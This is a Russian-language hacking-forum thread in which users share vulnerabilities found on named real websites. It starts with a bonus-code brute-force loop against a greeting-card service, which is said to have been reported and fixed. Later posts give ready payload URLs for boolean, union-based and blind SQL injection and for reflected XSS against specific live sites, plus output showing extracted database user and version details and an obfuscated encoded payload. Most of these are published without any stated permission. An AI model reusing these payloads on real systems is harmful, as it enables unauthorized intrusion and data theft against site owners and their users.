Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. SooLFaa

    SooLFaa Reservists Of Antichat

    Joined:
    17 Mar 2014
    Messages:
    455
    Likes Received:
    426
    Reputations:
    132
    Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?
    Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.
    Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:
    Первое, авторизовываемся не через телефон, а средствами забытого пароля:
    [​IMG]
    Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.
    [​IMG]
    Далее тупо перебираем скриптом в консоле
    Code:
    for (var i = 800000; i < 800100; i++) { $('.bonus-text').val(i); $('.bonus-send').click(); }
    Что интересно под авторизацией через телефон дает только три попытки, а через средство забытого пароля без ввода телефона - без проблем сколько угодно, связано скорее всего с куками.
    Ну и профитик
    [​IMG]
    Репорт отправлен и на момент написания статьи уже пофикшено. А добрые ребятки отправили мне в благодарность много бесплатных кодов.
     
    _________________________
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    782
    Likes Received:
    912
    Reputations:
    58
    #242 BabaDook, 25 Oct 2016
    Last edited: 26 Oct 2016
  3. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    122
    Likes Received:
    48
    Reputations:
    14
  4. MrFear41

    MrFear41 New Member

    Joined:
    11 Dec 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Exploit :
    Boolean Based SQL Injection

    Code:
    http://villagelifeserver.ru/contest.php?ID=' OR 'ns'='ns
     
  5. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    782
    Likes Received:
    912
    Reputations:
    58
  6. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
    Gorev likes this.
  7. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
    #248 SeytaR, 4 Feb 2017
    Last edited by a moderator: 12 Feb 2017
  8. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    122
    Likes Received:
    48
    Reputations:
    14
  9. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
  10. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
    SQL INJECTION DRONES LAB

    https://www.drones-lab.com/blog/post.php?id=-24 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9--+&titre=Drones-lab-est-le-er-centre-de-formation-agree-par-lOSAC#.WJizCdKLTIX

    droneslab@localhost : droneslab_website : 10.1.18-MariaDB

    USER_PRIVILEGES:droneslab'@'localhost' -> NO
     
  11. pw0ned

    pw0ned Member

    Joined:
    8 Jan 2016
    Messages:
    122
    Likes Received:
    48
    Reputations:
    14
    Firefox

    Code:
    http://top.zhyk.ru/search?rate=0%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&chronic=0&filter=%D0%9F%D0%BE%D0%B4%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D1%8C+%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80
    [​IMG]
     
    lolidoli and SeytaR like this.
  12. leksadin

    leksadin Level 8

    Joined:
    19 Jan 2016
    Messages:
    117
    Likes Received:
    47
    Reputations:
    2
    Blind SQL injection

    agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32
    В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары.

    Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки (<, >) весь остальной текст удаляется.
     
    #253 leksadin, 10 Feb 2017
    Last edited: 17 Feb 2017
  13. SaNDER

    SaNDER Member

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
  14. SooLFaa

    SooLFaa Reservists Of Antichat

    Joined:
    17 Mar 2014
    Messages:
    455
    Likes Received:
    426
    Reputations:
    132
    Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....
     
    _________________________
  15. leksadin

    leksadin Level 8

    Joined:
    19 Jan 2016
    Messages:
    117
    Likes Received:
    47
    Reputations:
    2

    Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд.

    Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.
     
  16. SooLFaa

    SooLFaa Reservists Of Antichat

    Joined:
    17 Mar 2014
    Messages:
    455
    Likes Received:
    426
    Reputations:
    132
    Так это не противоречит тому, что я написал. Если ты выводишь алерт через параметр со страницы или через скулю....это немного разные вещи. Я только об этом.
     
    _________________________
    leksadin likes this.
  17. SeytaR

    SeytaR New Member

    Joined:
    7 Apr 2016
    Messages:
    9
    Likes Received:
    1
    Reputations:
    7
  18. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    782
    Likes Received:
    912
    Reputations:
    58
    PHP:
    http://keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VGplNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkDNiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeVpmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZkWWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUTJWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2MoZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNVTHlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYHhHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRGSWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSNxmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRkSrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJpVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1UMSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVWxWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cnWEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYtZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5UVWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dVRlTDFGbSVlUtRHa
    Есть ещё всяких много разных, если будет интерес буду выкладывать редко
     
    pastword and leksadin like this.
  19. pastword

    pastword New Member

    Joined:
    19 Feb 2017
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    интереснее то, как ты нашел уязвимость)), но все таки выкладывай, очень интересно увидеть разные случай.
     
    #260 pastword, 16 Mar 2017
    Last edited: 17 Mar 2017
Loading...